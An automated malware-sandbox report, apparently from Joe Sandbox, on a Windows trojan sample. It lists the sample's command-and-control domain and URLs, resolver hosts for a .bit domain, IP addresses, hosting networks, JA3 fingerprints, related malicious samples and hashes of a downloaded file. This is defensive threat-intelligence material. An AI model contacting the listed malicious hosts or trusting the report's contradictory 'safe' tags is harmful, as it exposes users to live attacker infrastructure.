http://crl.identru1	0%	Avira URL Cloud	safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt	0%	Avira URL Cloud	safe
https://bdns.link/	0%	Avira URL Cloud	safe
http://dolboeb1701.com/bgczXibj92HSlSCK/	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://dolboeb1701.com/bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615R	0%	Avira URL Cloud	safe
https://bdns.im/r/kpotuvorot10.bit	0%	Avira URL Cloud	safe
https://bdns.by/r/kpotuvorot10.bit	0%	Avira URL Cloud	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://bdns.co/r/kpotuvorot10.bit	0%	Avira URL Cloud	safe
https://bdns.nu/	0%	Avira URL Cloud	safe
https://bdns.io/	0%	Avira URL Cloud	safe
http://dolboeb1701.com/bgczXibj92HSlSCK	0%	Avira URL Cloud	safe
https://bdns.nu/r/kpotuvorot10.bit	0%	Avira URL Cloud	safe
http://47.91.94.99/bgczXibj92HSlSCK	0%	Avira URL Cloud	safe
https://bdns.io/r/kpotuvorot10.bit	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bdns.im	194.54.82.12	true	false	1%, Virustotal, Browse	unknown
bdns.by	88.80.20.20	true	false	4%, Virustotal, Browse	unknown
bdns.nu	88.80.20.20	true	false	0%, Virustotal, Browse	unknown
bdns.pro	194.54.82.12	true	false		unknown
bdns.io	190.115.26.106	true	false		unknown
bdns.co	88.80.21.20	true	false		unknown
dotbit.me	144.76.12.6	true	false		unknown
dolboeb1701.com	47.91.94.99	true	true		unknown
bdns.link	62.75.198.178	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bdns.link/r/kpotuvorot10.bit	false	Avira URL Cloud: safe	unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/login.php	true	Avira URL Cloud: safe	unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/util.php	true	Avira URL Cloud: safe	unknown
https://bdns.pro/r/kpotuvorot10.bit	false	Avira URL Cloud: safe	unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615	true	Avira URL Cloud: safe	unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/	true	Avira URL Cloud: safe	unknown
https://bdns.im/r/kpotuvorot10.bit	false	Avira URL Cloud: safe	unknown
https://bdns.by/r/kpotuvorot10.bit	false	Avira URL Cloud: safe	unknown
https://bdns.co/r/kpotuvorot10.bit	false	Avira URL Cloud: safe	unknown
http://dolboeb1701.com/bgczXibj92HSlSCK	true	Avira URL Cloud: safe	unknown
https://bdns.nu/r/kpotuvorot10.bit	false	Avira URL Cloud: safe	unknown
http://47.91.94.99/bgczXibj92HSlSCK	true	Avira URL Cloud: safe	unknown
https://bdns.io/r/kpotuvorot10.bit	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.543675957.00000000057B1000.00000004.00000001.sdmp	false		high
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeC	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560432557.0000000005555000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/ac/?q=	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.543675957.00000000057B1000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1-	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573682947.00000000054D9000.00000004.00000001.sdmp	false		high
https://bdns.pro/	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bdns.pro/$	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bdns.im/r/kpotuvorot10.bit-u	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bdns.nu/l	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bdns.io/r/kpotuvorot10.bitqu	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.adobe.c/g	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.568301447.000000000331C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/de-ch/J	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573481843.0000000005519000.00000004.00000001.sdmp	false		high
http://r3.i.lencr.org/0	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560738292.000000000550F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://bdns.im/	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://dolboeb1701.com/	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.599195628.00000000054FD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573455129.00000000055A2000.00000004.00000001.sdmp	false		high
https://bdns.pro/r/kpotuvorot10.bitr~	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573429634.0000000005555000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573455129.00000000055A2000.00000004.00000001.sdmp	false		high
http://r3.o.lencr.org0	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560738292.000000000550F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dotbit.me/	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.588814859.0000000002E7D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.identru1	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.599195628.00000000054FD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe8	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.546851098.0000000005555000.00000004.00000001.sdmp	false		high
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573455129.00000000055A2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bdns.link/	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.root-x1.letsencrypt.org0	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560738292.000000000550F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615R	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573816242.0000000002EFB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1s	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573741077.00000000054CB000.00000004.00000001.sdmp	false		high
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.540284223.0000000005559000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560432557.0000000005555000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/chrome_newtab$	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp	false		high
http://cps.letsencrypt.org0	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560738292.000000000550F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.543675957.00000000057B1000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573682947.00000000054D9000.00000004.00000001.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573653974.00000000054FD000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573481843.0000000005519000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573455129.00000000055A2000.00000004.00000001.sdmp	false		high
https://bdns.nu/	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573627321.00000000054F1000.00000004.00000001.sdmp	false		high
https://bdns.io/	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574022130.0000000002EBD000.00000004.00000001.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehpN	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573429634.0000000005555000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573481843.0000000005519000.00000004.00000001.sdmp	false		high
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exem	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.550092812.0000000005559000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573682947.00000000054D9000.00000004.00000001.sdmp	false		high
https://contextual.media.net/checksync.php	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
88.80.20.20	unknown	Sweden	33837	PRQ-AS________________________SE	false
190.115.26.106	unknown	Belize	262254	DDOS-GUARDCORPBZ	false
62.75.198.178	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	false
88.80.21.20	unknown	Sweden	33837	PRQ-AS________________________SE	false
144.76.12.6	unknown	Germany	24940	HETZNER-ASDE	false
194.54.82.13	unknown	Ukraine	41018	OMNILANCEhttpomnilancecomUA	false
194.54.82.12	unknown	Ukraine	41018	OMNILANCEhttpomnilancecomUA	false
47.91.94.99	unknown	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356849
Start date:	23.02.2021
Start time:	17:48:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.2129 (renamed file extension from 2129 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.spyw.winEXE@1/1@25/8
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 40.88.32.150, 13.64.90.137, 23.211.6.115, 104.43.193.48, 51.104.144.132, 2.20.142.210, 2.20.142.209, 52.155.217.156, 51.103.5.159, 20.54.26.129, 92.122.213.247, 92.122.213.194, 51.104.139.180, 184.30.20.56 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
88.80.20.20	9wug7GSJuB.exe	Get hash	malicious	Browse
62.75.198.178	SecuriteInfo.com.Trojan.GenericKD.43544658.14342.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bdns.by	9wug7GSJuB.exe	Get hash	malicious	Browse	88.80.20.20
dolboeb1701.com	9wug7GSJuB.exe	Get hash	malicious	Browse	49.51.51.190
dotbit.me	payload.exe	Get hash	malicious	Browse	107.161.16.236
	0BRMqp4S7B.exe	Get hash	malicious	Browse	107.161.16.236
	Firefox_60.2.exe	Get hash	malicious	Browse	107.161.16.236
	danKjddnnsa.exe	Get hash	malicious	Browse	107.161.16.236
	viviKjddnnsa.exe	Get hash	malicious	Browse	107.161.16.236
	RZwdrxg6QQ.exe	Get hash	malicious	Browse	107.161.16.236
	fQj9FXb50.exe	Get hash	malicious	Browse	107.161.16.236
	neutrino.exe	Get hash	malicious	Browse	107.161.16.236
	http://bad-karma.tk/panel/upload/payload.exe	Get hash	malicious	Browse	107.161.16.236

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GD-EMEA-DC-SXB1DE	IU-8549 Medical report COVID-19.doc	Get hash	malicious	Browse	62.75.141.82
	ransomware.exe	Get hash	malicious	Browse	77.91.233.67
	SecuriteInfo.com.Trojan.GenericKD.43544658.14342.exe	Get hash	malicious	Browse	62.75.198.178
	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	5.35.225.156
	Io8ic2291n.doc	Get hash	malicious	Browse	83.169.21.32
	v1K1JNtCgt.exe	Get hash	malicious	Browse	134.119.76.46
	vG4U0RKFY2.exe	Get hash	malicious	Browse	85.93.89.6
	VufxYArno1.exe	Get hash	malicious	Browse	217.172.179.54
	hse8DRMQnI.exe	Get hash	malicious	Browse	188.138.33.233
	sharpelevators.in__wkt887.rar.dll	Get hash	malicious	Browse	80.86.91.27
	creoagent.dll	Get hash	malicious	Browse	5.35.248.28
	creoagent.dll	Get hash	malicious	Browse	5.35.248.28
	file.exe	Get hash	malicious	Browse	85.25.177.199
	l0sjk3o.dll	Get hash	malicious	Browse	80.86.91.27
	tEsPDds30F.exe	Get hash	malicious	Browse	80.86.91.27
	neidyjzyu.dll	Get hash	malicious	Browse	80.86.91.27
	kmqwedm.dll	Get hash	malicious	Browse	80.86.91.27
	k4fe4cay.dll	Get hash	malicious	Browse	80.86.91.27
	INV8222874744_20210111490395.xlsm	Get hash	malicious	Browse	80.86.91.27
	Inv0209966048-20210111075675.xls	Get hash	malicious	Browse	80.86.91.27
DDOS-GUARDCORPBZ	sample catalog_copy.exe	Get hash	malicious	Browse	190.115.18.132
	SKM_C221200706052800n.exe	Get hash	malicious	Browse	190.115.18.132
	https://sites.google.com/view/tt90	Get hash	malicious	Browse	190.115.26.110
	http://gobankcustomerservice.com	Get hash	malicious	Browse	190.115.26.62
	https://superlots.page.link/free?c8j	Get hash	malicious	Browse	190.115.26.222
	http://zbigniewlapinski.firehost.pl/wp-content/themes/spun/js/check_EA0D48.htm	Get hash	malicious	Browse	190.115.26.222
	https://imperialwinestorage.com/wp-content/themes/Divi/includes/builder/api/rest/check_3C28F2.htm	Get hash	malicious	Browse	190.115.26.222
	https://superlots.page.link/free?epfr5	Get hash	malicious	Browse	190.115.26.222
	Da9Ph8u58q.exe	Get hash	malicious	Browse	190.115.18.139
	https://clck.ru/RNbUF?fin&sa=D&ust=1602741952456000&usg=AFQjCNElQYx27MCZDQSMHLUS9cc9WO41mQ	Get hash	malicious	Browse	190.115.26.117
	viWvPJQw.exe	Get hash	malicious	Browse	190.115.18.139
	http://prevuse.ru	Get hash	malicious	Browse	190.115.26.190
	https://kyjuvo.xyz	Get hash	malicious	Browse	190.115.24.170
PRQ-AS________________________SE	9wug7GSJuB.exe	Get hash	malicious	Browse	88.80.20.20

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	SecuriteInfo.com.Trojan.GenericKD.45695593.9197.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	SecuriteInfo.com.Trojan.GenericKD.45695593.9197.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	SHIPPING-DOCUMENT.docx	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	svhost.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	SecuriteInfo.com.Trojan.GenericKDZ.73124.19170.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	SecuriteInfo.com.Trojan.GenericKD.36273230.25906.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	SecuriteInfo.com.Trojan.GenericKDZ.73124.19170.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	SecuriteInfo.com.Trojan.GenericKDZ.73123.31244.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	SecuriteInfo.com.Trojan.GenericKD.36273230.25906.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	proposal.xlsm	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	rieuro.dll	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	ydQ0ICWj5v.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	r4yGYPyWb7.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	aif9fEvN5g.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	bZ9avvcHvE.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	proposal.xlsm	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	CmJ6qDTzvM.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	124992436.docx	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	RRLrVfeAXb.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
	m3eJIFyc68.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 194.54.82.12 88.80.21.20
37f463bf4616ecd445d4a1937da06e19	Complaint_Letter_1186814227-02192021.xls	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	Purchase Order list.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	SHIPPING-DOCUMENT.docx	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	REVISED ORDER 2322020.EXE	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	PO112000891122110.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	OutplayedInstaller (1).exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	Facecheck - app-Installer (1).exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	Buff-Installer (9).exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	coltTicket#513473.htm	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	FortPlayerInstaller.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	RGB HeroInstaller.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	Buff-Installer.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	unmapped_executable_of_polyglot_duke.dll	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	smartandfinalTicket#51347303511505986.htm	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	f4b1bde3-706a-40d2-8ace-693803810b6f.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	LIQUIDACION INTERBANCARIA 02_22_2021.xls	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	document-550193913.xls	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12
	GUEROLA INDUSTRIES N#U00ba de cuenta.exe	Get hash	malicious	Browse	88.80.20.20 190.115.26.106 62.75.198.178 88.80.21.20 144.76.12.6 194.54.82.13 194.54.82.12

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\util[1].htm Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	992
Entropy (8bit):	5.946478448425453
Encrypted:	false
SSDEEP:	24:NUywiOOh+bN0kmotll2HFO8jywiLU+yNmo0iBLxeN9z:NxBOZeVobl2HFN2Bw+no0iNxeT
MD5:	30DFEA16E3383EF6817C8D377C8532C7
SHA1:	A013F6A3A593FCB4BCCD46B77F51F6B947FF01A7
SHA-256:	5737A123F645DFDA18123167AD4679D4E0349DE1537CD95EAE05162322E1529C
SHA-512:	AA1CEDDF9A73DC9E0992D92B1AE15DD46C0ADBA0F1E4AA40CA1B256950DCF1320004372F6EE039D8F8AB9C7AFF306B0CA650CB6E809AB7ADD552134461914A04
Malicious:	false
Reputation:	low
IE Cache URL:	http://dolboeb1701.com/bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615
